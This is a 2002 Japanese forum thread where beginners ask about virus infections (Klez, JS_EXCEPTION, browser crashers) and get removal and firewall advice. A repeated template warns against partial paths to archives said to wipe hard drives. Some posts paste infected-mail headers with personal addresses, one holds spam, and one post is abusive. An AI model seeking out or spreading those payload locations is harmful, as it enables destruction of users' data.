  http://www.trendmicro.co.jp/virusinfo/news2002/worm_fbound_b.asp
  http://www.symantec.com/region/jp/news/year02/020314.html
  http://www.nai.com/japan/virusinfo/virF.asp?v=W32/Fbound.c@MM

★jdbgmgr.exeがウイルスだというデマメールが流行しています。騙されないように。
  http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/virus/false/jdbgmgr.asp

★これらのURLはHDDを綺麗サッパリ消去してくれるので絶対踏まない事!!
〜//80s/puolnau/syokusya.zip
〜/tbtb/apuroda/file/153.lzh
〜/uni.s2.xrea.com/tbtb/apuroda/file/153.lzh
〜/source/hoge00110_20020623033541.lzh

46 :モウ!!:02/07/01 17:22 ID:gqs4ZcCe
今日、「.jpg」ファイルを開いたら
たくさん、インターネットエクスプローラのウィンドウが開いたり
アウトルックがたくさん開いたりしたんです。
コレってやばいですか?
一応ノートンを起動させているのですが・・・

47 :ひよこ名無しさん:02/07/01 17:36 ID:???
>>46
ブラクラだろ、ブラクラ。

http://www.google.com/search?num=50&lr=lang_ja&q=ブラウザクラッシャーとは

48 :47:02/07/01 17:36 ID:???
↓で行け

http://www.google.com/search?num=50&hl=ja&ie=Shift_JIS&q=%83u%83%89%83E%83U%83N%83%89%83b%83V%83%83%81%5B%82%C6%82%CD&btnG=Google+%8C%9F%8D%F5&lr=lang_ja

49 :ひよこ名無しさん:02/07/01 17:39 ID:???
>>46
「ブラクラでヤバい!」とかのブラクラチェッカー入れたら?

50 :ひよこ名無しさん:02/07/01 19:31 ID:ToCKsIZS
>>46
ただのJavaScriptだから全く心配いらん。
そういう危険なの見てるんなら一応JavaScriptはoffにしとけ。

51 :ひよこ名無しさん:02/07/01 19:54 ID:???
自分のPCがウィルスに感染しているかどうかを
知るにはどうしたら良いですか?
急にウィルスメールが届きだしたので困っています。

52 :メルトダウン:02/07/01 19:56 ID:???
>>51 とっととウィルススキャンしろ。ソフトがなきゃさっさと買ってこい。

53 :馬鹿ヒーのスレ:02/07/01 19:56 ID:???
http://pc.2ch.net/test/read.cgi/software/1001838214/
http://pc.2ch.net/test/read.cgi/sec/1020474494/

54 :ひよこ名無しさん:02/07/01 20:01 ID:???
>>51
ウイルシ対策ソフト入れてない香具師は、(・∀・)カエレ!!

55 :ひよこ名無しさん:02/07/01 20:26 ID:FIiD+evm
>>51
これ申し込んでみ?
ttp://security.biglobe.ne.jp/netguard/

56 :ひよこ名無しさん:02/07/01 20:39 ID:???
つーか、何故マルチでネタ野郎の>>51にレスしてるの?

57 :ひよこ名無しさん:02/07/01 20:41 ID:???
>>56
しまった!釣られたか ! ? 欝だ・・・

58 :ひよこ名無しさん:02/07/01 21:01 ID:???
(^○^)ゲラゲラ アホガミ-ル- ブタノケ-ツ-

59 :ひよこ名無しさん:02/07/01 21:03 ID:???
( ´,_ゝ`)プッ

60 :ひよこ名無しさん:02/07/01 22:56 ID:bEGtgYoe
X97M_LAROUX.A
というウイルスに感染したのでウイルスバスターで駆除してもう「ウイルスが発見されました」って表示が出なくなったのに、エクセルを開くたびに「ウイルスを発見しました」と表示されます。
ネットで見当たる対処はしてみたのですが何も変わりません。どうしたらよいでしょうか?



61 :ひよこ名無しさん:02/07/01 23:01 ID:???
今まで共に暮らしてきたフォントが突然使用不可になってしまいました
消えたのか?と思いコントロールパネルから逝ける『フォント』を開いたのですが
何故か消えてはなく全て無事なのです。はてな。

ボスケテー  

62 :ひよこ名無しさん:02/07/01 23:01 ID:O3gxAFZz
>>60
面倒だけどこれ読んだら?
ttp://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=1896

63 :ひよこ名無しさん:02/07/01 23:03 ID:???
>>61
http://pc.2ch.net/test/read.cgi/pcqa/1025531624/

64 :ひよこ名無しさん:02/07/01 23:04 ID:???
>>61
マルチすな。


65 :ひよこ名無しさん:02/07/01 23:27 ID:???
FAQやスレ違いの質問を平気でかます奴、直前のレスを読まない奴、
IDを出さない奴、「初心者です」とか抜かす奴。
上記に当てはまる奴は、多くの場合マルチポスター。

66 :初心者向けスレッド:02/07/02 00:41 ID:???
http://pc.2ch.net/test/read.cgi/win/1024932195/
「おまえは偉そうにしてるから何でも完璧にできるはずだろぉ?」
知人友人上司からの無料PCサポート依頼
http://pc.2ch.net/win/kako/1013/10139/1013922363.html
知人友人上司の無料PCサポート依頼を斬る!?Part2
http://pc.2ch.net/test/read.cgi/win/1019226654/
知人友人上司の無料PCサポート依頼を斬る!?Part3
http://pc.2ch.net/test/read.cgi/win/1022692960/
初心者に優しいサイト
http://terakoya.yomiuri.co.jp/index.html
まあ、社会人なんだから自分で解決する時間がないのはわかる。
でもね…
人 に 頼 る 時 く ら い 真 摯 な 態 度 を と ろ う や

67 :ひよこ名無しさん:02/07/02 01:11 ID:???
★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

★初心者ほど簡単にウイルスに感染します。

★古いウイルス定義は意味がない! 常に最新のものを!

★「Re:」という題名のメールで添付ファイルが届いたら>>6>>12を読もう!

★突然、女性の顔写真が画面いっぱいに表示されたら>>13を読もう!

★悪質なワーム・Klez.Eの亜種が流行しはじめています。対策は十分に!
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.e%40mm.html
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.h@mm.html
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G
 http://www.trendmicro.co.jp/klez/

★JS_EXCEPTIONが流行中。勉強しておきましょう。
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.A
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN

★patch.exeという添付ファイルつきのメールはウイルスですよ。
  http://www.trendmicro.co.jp/virusinfo/news2002/worm_fbound_b.asp
  http://www.symantec.com/region/jp/news/year02/020314.html
  http://www.nai.com/japan/virusinfo/virF.asp?v=W32/Fbound.c@MM

★jdbgmgr.exeがウイルスだというデマメールが流行しています。騙されないように。
  http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/virus/false/jdbgmgr.asp

★これらのURLはHDDを綺麗サッパリ消去してくれるので絶対踏まない事!!
〜//80s/puolnau/syokusya.zip
〜/tbtb/apuroda/file/153.lzh
〜/uni.s2.xrea.com/tbtb/apuroda/file/153.lzh
〜/source/hoge00110_20020623033541.lzh

68 :ひよこ名無しさん:02/07/02 03:26 ID:???
age

69 :ひよこ名無しさん:02/07/02 09:31 ID:oeuPsVMj
受信箱からウイルスメールを削除する方法を教えてくらさい。
選択→右クリック→削除をするんですが、
不正が行われたので強制終了!ってなるんです。
どうしたらいいの?

70 :ひよこ名無しさん:02/07/02 09:43 ID:???
>>69
これから特定のアプリについて質問する時は、アプリの名称とバージョンを書いてね。
あなたはそのソフトしか使ってないかも知れないけど、同じ用途に別のソフトを
使ってる人だって大勢いるのよ。
前置きはこのくらいにして、ソフトがOutlookExpressとしてなら、メールをクリック
ツールバーの赤い×をクリックとか、削除済みアイテムフォルダへドラッグするとか、
別の方法を試してみて。それでも強制終了するなら、一度データをバックアップして
メールソフト(メーラー)をアンインストールし、インストールしなおしてみてね。

71 :KlezE:02/07/02 12:35 ID:???
Received:from imfep02.kcom.ne.jp (210.174.120.146)
by ** with SMTP; **
Received:from Wwcvk ([211.133.14.132]) by imfep02.kcom.ne.jp
(InterMail vM.4.01.03.00 201-229-121) with SMTP id < 20020702003727_ZDCO18281_imfep02_kcom_ne_jp@imfep02.kcom.ne.jp >
for < mail@sg-mark.org >; **
From:wink< wink@pk.highway.ne.jp >
To: 211_133_14_132_Virus_Deleted@imfep02.kcom.ne.jp
nttkngw07132_ppp_infoweb_ne_jp_Virus_Deleted@imfep02.kcom.ne.jp
wink_at_pk_highway_ne_jp_Virus_Deleted@imfep02.kcom.ne.jp
Subject:ENTIRE AGREEMENT
Message-Id:< 20020702003727_ZDCO18281_imfep02_kcom_ne_jp_Wwcvk@imfep02.kcom.ne.jp >
Date**

添付ファイル
file.html
of
file.txt
PLAYRLIC.TXT

72 :ひよこ名無しさん:02/07/02 15:25 ID:loDhX9Ej
昨日W32.Elkern is a dangerous virus ・・というメールがいきなり届いたので
オンラインスキャンしたところクレズが駆除されましたというようなことになったのですが、
これで大丈夫なんでしょうか?さっきオンラインスキャンする前に知人にメールを
送ったら、返事が英語になってたんです。

73 :ひよこ名無しさん:02/07/02 15:55 ID:wIMCPREM
W95MTX.drのウイルスの詳しいことを教えて下さい
故意に送られてきているような気がして・・・・

ノートンをいれていたので感染は防げました

74 :ひよこ名無しさん:02/07/02 15:58 ID:???
>73
ノートンの会社に逝って調べてください

75 :ひよこ名無しさん:02/07/02 16:50 ID:wIMCPREM
>>74
逝ってきました、ありがとう

76 :ひよこ名無しさん:02/07/02 17:59 ID:eatHkgFO
やっとお金が貯まったので、今ウイルスバスターを買ってきました。
win98 で IE5.5 SP2 です。(この説明でいいのでしょうか)

前にここで教えてもらって、Zone Alarmをインストール
してあるんですけれど、ウイルスバスターをインストールする前に
こっちはアンインストールした方がいいんですか??

どなたかよろしくお願いしますです。


77 :ちぇいん ◆123Faq02 :02/07/02 18:02 ID:???
>>76
ノートンかバスター、多分バスターの方だったとは思うのですが
それをアンインストールしないとインストールできないYO!って警告の出る方が
あったような気がします。とりあえずはそのまま入れて、警告が出たらアンインストールしてみては?

78 :76:02/07/02 18:03 ID:eatHkgFO
即レスありがというございます!
晩ご飯食べたらゆっくりやってみようと思います!

79 :ひよこ名無しさん:02/07/02 18:18 ID:wkrAwbAr
今さっきノートンのダイアログ?が出てJS何とかって言うのに感染してる
って言われたのですが自動的に修復するはずなのにアクセスは拒否されました
たというのが2,3回出て消えたのでシステムのスキャンやっても引っかからないいんですが
どうなってしまったんですか?

80 :ひよこ名無しさん:02/07/02 18:26 ID:wkrAwbAr
79の訂正
×拒否されましたたというのが2,3回出て消えたのでシステムのスキャンやっても引っかからないいんですが
○拒否されましたというのが2,3回出て消えてしまったので不安になりシステムのスキャンをしたのですが引っかかりません
すみません。

81 :ひよこ名無しさん:02/07/02 19:08 ID:???
>>80
ъ( ゜ー^)キニスンナ!

82 :76:02/07/02 19:34 ID:SAHC0+sE
ウイルスの話とはちょっとずれているのかもしれないですが、
Zone Alarm のアンインストールが良くわからなくて困ってます。
英語ちんぷんかんぷん…(´д`;)

どなたか助けてください、お願いします。。。

83 :ひよこ名無しさん:02/07/02 19:48 ID:???
>>80
あー、多分それは2chのどっかにvbsスクリプトが張ってあったからかも
IEの一時ファイル(キャッシュ)を削除してみそ

>>82
アプリケーションの追加と削除に無いか?
つーか、あれは普通日本語化して使わない?
日本語化できるので、みんなが使っているのだが・・・

ウィルスバスターのFirewall機能を使わなければ別に削除しなくていい
むしろバスターの機能を殺してZAでも使ったほうがいい

84 :ひよこ名無しさん:02/07/02 19:57 ID:???
★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

★初心者ほど簡単にウイルスに感染します。

★古いウイルス定義は意味がない! 常に最新のものを!

★「Re:」という題名のメールで添付ファイルが届いたら>>6>>12を読もう!

★突然、女性の顔写真が画面いっぱいに表示されたら>>13を読もう!

★悪質なワーム・Klez.Eの亜種が流行しはじめています。対策は十分に!
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.e%40mm.html
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.h@mm.html
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G
 http://www.trendmicro.co.jp/klez/

★JS_EXCEPTIONが流行中。勉強しておきましょう。
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.A
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN

★patch.exeという添付ファイルつきのメールはウイルスですよ。
  http://www.trendmicro.co.jp/virusinfo/news2002/worm_fbound_b.asp
  http://www.symantec.com/region/jp/news/year02/020314.html
  http://www.nai.com/japan/virusinfo/virF.asp?v=W32/Fbound.c@MM

★jdbgmgr.exeがウイルスだというデマメールが流行しています。騙されないように。
  http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/virus/false/jdbgmgr.asp

★これらのURLはHDDを綺麗サッパリ消去してくれるので絶対踏まない事!!
〜//80s/puolnau/syokusya.zip
〜/tbtb/apuroda/file/153.lzh
〜/uni.s2.xrea.com/tbtb/apuroda/file/153.lzh
〜/source/hoge00110_20020623033541.lzh

85 :ひよこ名無しさん:02/07/02 19:59 ID:???
> ★これらのURLはHDDを綺麗サッパリ消去してくれるので絶対踏まない事!!
> 〜//80s/puolnau/syokusya.zip

俺、手もとの1台をクリーンインストールしようと思ってるんで、
URLの前半も教えてくれんかの。試してみたい。


86 :ひよこ名無しさん:02/07/02 20:12 ID:???
>>85
残念、消えてます。

87 :80:02/07/02 20:15 ID:wkrAwbAr
皆さんありがとうございました!!
84見て解決しました!!

88 :76:02/07/02 20:26 ID:e+zCoNUz
>83さん
そうなんですよね…、日本語化できるようにしなかったんです(;_;)
今なんとかアンインストールできたみたいです。
でも、ガーン…、ZAの方がよかったんですか…。

どこかで、ZAはふつうのアンインストールだけじゃ
完全にアンインストールはできないって読んだような気がしたんですけど…。
本当ですか??


89 :荒岸 ◆MONa3xWM :02/07/02 20:30 ID:???
>>88

初耳ですな。出来ればソースを教えていただけると。

http://www.forest.impress.co.jp/library/outpostfirewallfree.html
これもいいらしいですよ。乗り換え検討中。

90 :ひよこ名無しさん:02/07/02 20:32 ID:???
>>89
Outpost Firewall FREE (・∀・)イイ!!

91 :荒岸 ◆MONa3xWM :02/07/02 20:37 ID:???
>>90

やっぱり良いですか?それにしてもZAが完全にアンインストール出来ないとなると
困るなぁ(笑)ちょっと調べてみるか…

92 : :02/07/02 20:37 ID:oxXUkSjP
Norton Antivirus2002の製品登録をシマンテックのウェブサイトで行いました。
今日、シマンテックカスタマーサービスセンターから、
登録完了のお知らせのメールが来たのですが、
Norton AntiVurusの ヘルプ>製品登録 では、まだ未登録になっています。
どうすれば登録したことを入力できるのでしょうか?


93 :ひよこ名無しさん:02/07/02 20:38 ID:???
>>92
HELP

94 :ひよこ名無しさん:02/07/02 20:39 ID:???
>>92
LiveUpdeして、ウイルス定義ファイルが更新されてたらほっとけば?

95 :ひよこ名無しさん:02/07/02 20:39 ID:???
>>92
登録したのなら、ほっとけばいいじゃん。

96 :荒岸 ◆MONa3xWM :02/07/02 20:40 ID:???
>>88

http://www.ryulife.com/net/faq.html
↑ここの、
4.ZoneAlarmのアンインストール方法
b.厳密なアンインストール方法
c.完全なアンインストール方法
見てみてください。特定のソフトと競合するようですね。

97 :ひよこ名無しさん:02/07/02 20:41 ID:???
>>94
LiveUpde ×

LiveUpdate ○

98 :ひよこ名無しさん:02/07/02 20:45 ID:???
( ´,_ゝ`) プッ

99 :92:02/07/02 21:00 ID:oxXUkSjP
>>93-95
ありがとうございます。
ウィルス定義ファイルは 02/06/26 になっていますが良いのでしょうか?

100 :88:02/07/02 21:01 ID:pW1MDZdx
>96さん
そうそう、こういうやつでした。
で、バスター2002をいれたんです、私。
aの基本的なアンインストールをしちゃったんですが、
これじゃぁ完全ではないってことですよね?

bで書いてあることがイマイチ良くわからないのですが、
もうちょっと優しく解説してもらうことはできないでしょうか…(;_;)

101 :荒岸 ◆MONa3xWM :02/07/02 21:06 ID:???
>>100

いや、あそこの解説以上に優しくと言われましても…
とりあえずもう一度ZONE Alarmインストールして、bを熟読したら特に
難しいところはないと思いますけど…どこがわからないの?

102 :88:02/07/02 21:14 ID:pW1MDZdx
>100さん
そうですよね。。。
もういちどインストールしてみます。

bの、「なお、実際問題としては・・・」の前までの部分を
行えばオーケーってことでいいんですよ…ね??
なんども申し訳ありませんです。

103 :荒岸 ◆MONa3xWM :02/07/02 21:15 ID:???
>>102

そうですそうです。bのやり方で競合するファイルも削除されるってことですから。

104 :88:02/07/02 21:25 ID:pW1MDZdx
>103
ああぁ、ほんとに何度もすみません。
今、ZAをダウンロードしてるんですけれど、
バスターをインストールしてあるのに、他のファイアーウォールの
インストールを行っても平気なんですか??

105 :荒岸 ◆MONa3xWM :02/07/02 21:30 ID:???
>>104

複数併用したこと無いので何とも言えませんが、気になるならそちらも
アンインストールしてからの方が良いかもね。

106 :88:02/07/02 21:35 ID:pW1MDZdx
>104
今いそいでバスターの方をアンインストールしたんですが、
ちょっと間に合わなかったらしく、バスターでZAのインストールができなかった
みたいです。。。もいちどやってみます。。。(;_;)

107 :88:02/07/02 22:37 ID:+4xdRFLa
荒岸さま
いろいろとありがとうございました!!
なんとかアンインストール&インストールできたようです。
今、全ドライブ検索してます。本当に色々とお世話になリました。


108 :ひよこ名無しさん:02/07/03 00:49 ID:???
★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

★初心者ほど簡単にウイルスに感染します。

★古いウイルス定義は意味がない! 常に最新のものを!

★「Re:」という題名のメールで添付ファイルが届いたら>>6>>12を読もう!

★突然、女性の顔写真が画面いっぱいに表示されたら>>13を読もう!

★悪質なワーム・Klez.Eの亜種が流行しはじめています。対策は十分に!
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.e%40mm.html
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.h@mm.html
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G
 http://www.trendmicro.co.jp/klez/

★JS_EXCEPTIONが流行中。勉強しておきましょう。
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.A
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN

★patch.exeという添付ファイルつきのメールはウイルスですよ。
  http://www.trendmicro.co.jp/virusinfo/news2002/worm_fbound_b.asp
  http://www.symantec.com/region/jp/news/year02/020314.html
  http://www.nai.com/japan/virusinfo/virF.asp?v=W32/Fbound.c@MM

★jdbgmgr.exeがウイルスだというデマメールが流行しています。騙されないように。
  http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/virus/false/jdbgmgr.asp

★これらのURLはHDDを綺麗サッパリ消去してくれるので絶対踏まない事!!
〜//80s/puolnau/syokusya.zip
〜/tbtb/apuroda/file/153.lzh
〜/uni.s2.xrea.com/tbtb/apuroda/file/153.lzh
〜/source/hoge00110_20020623033541.lzh


109 :KlezE:02/07/03 02:51 ID:???
Received:from imfep02.kcom.ne.jp (210.174.120.146)
by ** with SMTP; **
Received:from Wwcvk ([211.133.14.132]) by imfep02.kcom.ne.jp
(InterMail vM.4.01.03.00 201-229-121) with SMTP id < 20020702003727_ZDCO18281_imfep02_kcom_ne_jp@imfep02.kcom.ne.jp >
for < mail@sg-mark.org >; **
From:wink< wink@pk.highway.ne.jp >
To: 211_133_14_132_Virus_Deleted@imfep02.kcom.ne.jp
nttkngw07132_ppp_infoweb_ne_jp_Virus_Deleted@imfep02.kcom.ne.jp
wink_at_pk_highway_ne_jp_Virus_Deleted@imfep02.kcom.ne.jp
20020702003727_ZDCO18281_Virus_Deleted@imfep02.kcom.ne.jp
Subject:ENTIRE AGREEMENT
Message-Id:< 20020702003727_ZDCO18281_imfep02_kcom_ne_jp_Wwcvk@imfep02.kcom.ne.jp >
Date**

添付ファイル
file.html
of
file.txt
PLAYRLIC.TXT

110 :age:02/07/03 11:09 ID:???


111 :Virus Warning Message :02/07/03 19:00 ID:???
Received:from imlmta03.aics.ne.jp(157.205.253.215)
by ** with SMTP; **
Received:from virmta04.aics.ne.jp ([157.205.253.132])
by imlmta03.aics.ne.jp (InterMail vM.5.01.03.13
201-253-122-118-113-20010918) with ESMTP id < 20020703004602_IOPO18809_imlmta03_aics_ne_jp_Virus_Deleted@virmta04.aics.ne.jp >
for< nttkngw07132_ppp_infoweb_ne_jp_Virus_Deleted@imfep02.kcom.ne.jp >; **
Received: from Zpkjjgmy ([61.124.120.25]) by virmta04.aics.ne.jp
(InterMail vM.5.01.03.13 201-253-122-118-113-20010918) with SMTP id < 20020703004519.SPIT20864.virmta04.aics.ne.jp_Virus_Deleted@virmta04.aics.ne.jp >
for< 211_133_14_132_Virus_Deleted@imfep02.kcom.ne.jp >; **
From:customer< customer@sponichi.co.jp >
To: 20020703004602_IOPO18809_imlmta03_aics_ne_jp_Virus_Deleted@aso.aics.ne.jp
20020703004519.SPIT20864.virmta04.aics.ne.jp_Virus_Deleted@aso.aics.ne.jp ntkngw020025_isdn_ppp_infoweb_ne_jp_Virus_Deleted@zao.aics.ne.jp
61_124_120_25_Virus_Deleted@zao.aics.ne.jp
Subject: A very powful tool
Message-Id:< 20020703004519_SPIT20864_virmta04_aics_ne_jp_Virus_Deleted@imlmta03.aics.ne.jp >
Date**

Hello,This is a special powful tool
I hope you would like it.

------------------ Virus Warning Message (on the network)

Found virus WORM_KLEZ.E in file BORDER.pif
The file is deleted.

---------------------------------------------

112 :ひよこ名無しさん:02/07/03 23:53 ID:???
★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

113 :哀れな初心者 ◆T/kNaijE :02/07/04 02:13 ID:???
ウイルスにやられ、リカバリーを決意しました。

画像や文書はフロッピーで移せ、と言われて理解したのですが、
メール(OE)、メッセンジャー、お気に入りに入れている項目、その他のソフトのバックアップの取り方がどうしてもわかりません。。
あと、僕のPCにはもともとDVDが見れるソフト(powerDVD)が着いていたのですが、
リカバリーするとこれはなくなってしまうのでしょうか、、??
また、フレッツ接続ツールはどうなりますか??
わかる方、誰か教えて下さい!!

<PC環境>
ウィンドウズ98、SOTEC,PCstationのM250A

114 :ひよこ名無しさん:02/07/04 03:21 ID:???
>>113
少しは自分で調べましょう。IDを出すように。

リカバリの方法は
http://www.google.co.jp/search?q=Windows%E3%80%80%E3%83%AA%E3%82%AB%E3%83%90%E3%83%AA%E3%80%80%E6%96%B9%E6%B3%95&ie=UTF-8&oe=UTF-8&hl=ja&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja

を見て下さい。

115 :ひよこ名無しさん:02/07/04 04:33 ID:DnmDp5Zp
JS_EXCEPTIONとか貰うページを見て、NortonAntiVirusのウィンドウが開いたとき
PCから「ギョッ」って音がするんですけど普通ですか?

116 :ひよこ名無しさん:02/07/04 04:43 ID:???
「ギョッ」っておもろいな(W

117 :ひよこ名無しさん:02/07/04 05:12 ID:DnmDp5Zp
>>116
しませんか?
HDDがなんかなってるのかな…

118 :ひよこ名無しさん:02/07/04 05:36 ID:???
HDDが仕事してます。

119 :ひよこ名無しさん:02/07/04 05:59 ID:???
>>113
マルチをしてしまったのだから自殺を決意しろ。氏ね!

120 :ひよこ名無しさん:02/07/04 13:55 ID:NQqqK2S5
みなさんこんにちわ。
ウイルスに感染してしまったので対処法を教えてください

VBS.Network

これなんですが、調べると

1. Windows Explorerを使用して全ての検出されたファイルを削除する。
2. コンピュータを再起動する。

と、出るので、ファイルを検索して削除しようとすると

システムファイルです、これを削除するとWindowsが
正しく作動しない恐れがあります

と出るんです。
それでもこの通りにすればいいのでしょうか?

ノートン先生も見つけ出してはくれたのですが
処置はしてくれませんでした。

みなさん、よろしくおねがいします。




121 :荒岸 ◆MONa3xWM :02/07/04 14:00 ID:???
>>120

検出ファイル名をフルパスで出してみて。

122 :ひよこ名無しさん:02/07/04 14:11 ID:???
メールの送受信にOutLookを使っているんですけど、
日頃ユーザーを切り替えて(以下@A)、使い分けています。

今はAの方をメインユーザーに設定して使っています。
先日友人のパソコンが「Klez_E」に感染したそうです。
友人には@のアドレスを教えていたので、
@の方にウィルスメールが大量に溜まっていると重います。
重要なメールは@をよく使うので、
このまま受信ボタンを押さないわけにはいきません、、、、

とりあえず受信時にプレビュー画面を表示してしまう設定を
無効にしておけば良いのでしょうけれど、
今は起動時にAが開くようになっていますから、
@にユーザーを切り替えをしてそれらの設定をしなければなりません。
しかし@に切り替えた時点で
送受信〜開封まで行ってしまう設定になっているので怖いです。

このような状況で何か良い方法はないでしょうか。
やはり一度受信して感染してから駆除するしかないのでしょうか。

123 :122:02/07/04 14:12 ID:ca+kI3Xl
↑すみません。ID晒すの忘れてました。失礼しました。
お願いしまs。

124 :ひよこ名無しさん:02/07/04 14:24 ID:NQqqK2S5
>>121さん
遅くなってすいません>>120です。

C:\WINDOWS\Temporary Internet Files\Content.IE5

これだとおもいます。
よろしくおねがいします。


125 :荒岸 ◆MONa3xWM :02/07/04 14:28 ID:???
>>124

インターネットオプションからインターネット一時ファイルのクリアしてみて。

126 :ひよこ名無しさん:02/07/04 14:31 ID:NQqqK2S5
>>125さん

やりました、このあとどうすればいいのでしょうか。

よろしくおねがいします。

127 :荒岸 ◆MONa3xWM :02/07/04 14:32 ID:???
>>126

ノートン先生にもう一度ウィルスがいないか聞いてみて。結構頼りになりますよ。
いなかったらそれでOK

128 :ひよこ名無しさん:02/07/04 14:34 ID:NQqqK2S5
>>127さん

はい、やってみます、ありがとうございました

出来たら報告いたします。

いってきます。

129 :ひよこ名無しさん:02/07/04 14:37 ID:iUzGBuHS
一時期2chで配られたマンキン.exeって
ノートン先生のウィルスチェックで警告してくれますか?

130 :ひよこ名無しさん:02/07/04 15:20 ID:???
>>123
nPOP等を使ってメールのヘッダだけ見てウィルス付臭いのを削除するとか

回線切ってメーラーの設定すれば?

131 :ひよこ名無しさん:02/07/04 15:24 ID:ca+kI3Xl
>130
なるほどっ!
ありがとうございます!

132 :ひよこ名無しさん:02/07/04 15:39 ID:???
>>129
今は警告出る

133 :ひよこ名無しさん:02/07/04 16:33 ID:PGtuf70u
>>113
哀れなの?
>お気に入り
ttp://www.sharp.co.jp/sc/excite/mebiuslife/Mebius/talk/talk010510.html
>OE
ttp://www2.biglobe.ne.jp/~snagano/factory/oebackup.html
>おまけ
ttp://www.asahi-net.or.jp/~tz2s-nsmr/dbxview.html
こんなの検索すれば一発だ。
あとはがんばって。

134 : :02/07/04 16:38 ID:???
>>132
検出名は?

135 : :02/07/04 16:40 ID:???
借金まみれの身でありながらインターネットやる暇はあるらしい。
ウイルス対策せよ。
Received:from imlmta01.aics.ne.jp (157.205.253.210)
by ** with SMTP; **
Received:from virmta04.aics.ne.jp ([157.205.253.148])
by imlmta01.aics.ne.jp (InterMail vM.5.01.03.13 201-253-122-118-113-20010918)
with ESMTP id< 20020704012828_ULUP20472_imlmta01_aics_ne_jp@imlmta01.aics.ne.jp >
for< WealthbuildersRemove@thecenter.zzn.com >; **
Received:from Eqeuowvjp ([61.124.119.226]) by virmta04.aics.ne.jp
(InterMail vM.5.01.03.13 201-253-122-118-113-20010918) with SMTP id < 20020704012757_XCMJ20864_virmta04_aics_ne_jp@virmta04.aics.ne.jp >
for< WealthbuildersRemove@thecenter.zzn.com >; **
From:taro< taro@bar.or.jp >
To: WealthbuildersRemove@thecenter.zzn.com joem8788g44@hotbot.com
20020704012828_ULUP20472_imlmta01_aics_ne_jp@zao.aics.ne.jp
20020704012757_XCMJ20864_virmta04_aics_ne_jp@aso.aics.ne.jp
20020704012828_ULUP20472_imlmta01_aics_ne_jp@aso.aics.ne.jp
20020704012757_XCMJ20864_virmta04_aics_ne_jp@zao.aics.ne.jp
ntkngw019226_isdn_ppp_infoweb_ne_jp_Virus_Deleted@zao.aics.ne.jp
61_124_119_226_Virus_Deleted@aso.aics.ne.jp
ウイルス対策せよ。
Subject:A humour game
Message-Id:< 20020704012757_XCMJ20864_virmta04_aics_ne_jp@virmta04.aics.ne.jp >
Date**
This is a very humour game
This game is my first work.
You're the first player.
I hope you would like it.

------------------ Virus Warning Message (on the network)

Found virus WORM_KLEZ.E in file install.exe
The file is deleted.

---------------------------------------------------------
馬鹿ヒーの佐藤さん
ある男の貧乏脱出物語
現 在 の 私
2000万の借金の返済を無事に終えました。
とてもほっとしています。
仕事は年に4〜5回、香港、パリ、ロスなどの出張をこなし、
普段は日本中を車や、新幹線、飛行機で、飛び回っています。とても充実しています。
http://muneyasu.com/pa-tsu/gennzai.html
http://muneyasu.com/index.html

136 :ひよこ名無しさん:02/07/04 16:51 ID:???
★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

★初心者ほど簡単にウイルスに感染します。

★古いウイルス定義は意味がない! 常に最新のものを!

★「Re:」という題名のメールで添付ファイルが届いたら>>6>>12を読もう!

★突然、女性の顔写真が画面いっぱいに表示されたら>>13を読もう!

★悪質なワーム・Klez.Eの亜種が流行しはじめています。対策は十分に!
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.e%40mm.html
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.h@mm.html
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G
 http://www.trendmicro.co.jp/klez/

★JS_EXCEPTIONが流行中。勉強しておきましょう。
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.A
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN

★patch.exeという添付ファイルつきのメールはウイルスですよ。
  http://www.trendmicro.co.jp/virusinfo/news2002/worm_fbound_b.asp
  http://www.symantec.com/region/jp/news/year02/020314.html
  http://www.nai.com/japan/virusinfo/virF.asp?v=W32/Fbound.c@MM


137 :132はいい加減:02/07/04 18:43 ID:???
 

138 :初心者:02/07/04 20:19 ID:???
JS_NOCLOSE,Eというウイルスに感染してしまいました 
今後僕は何をすればいいんでしょうか・・
なにもわかりません
対処法を教えてくれる人誰かいませんでしょうか・・

139 :ひよこ名無しさん:02/07/04 20:23 ID:mlNiK4Aa
AntiVir という無料のアンチウィルスソフトをダウンロード
したのですが、アイコンも設定画面も出てきません。
ちゃんと起動してるのでしょうか?してる気がしません・・・
設定とかするはどうすればいいんでしょうか?

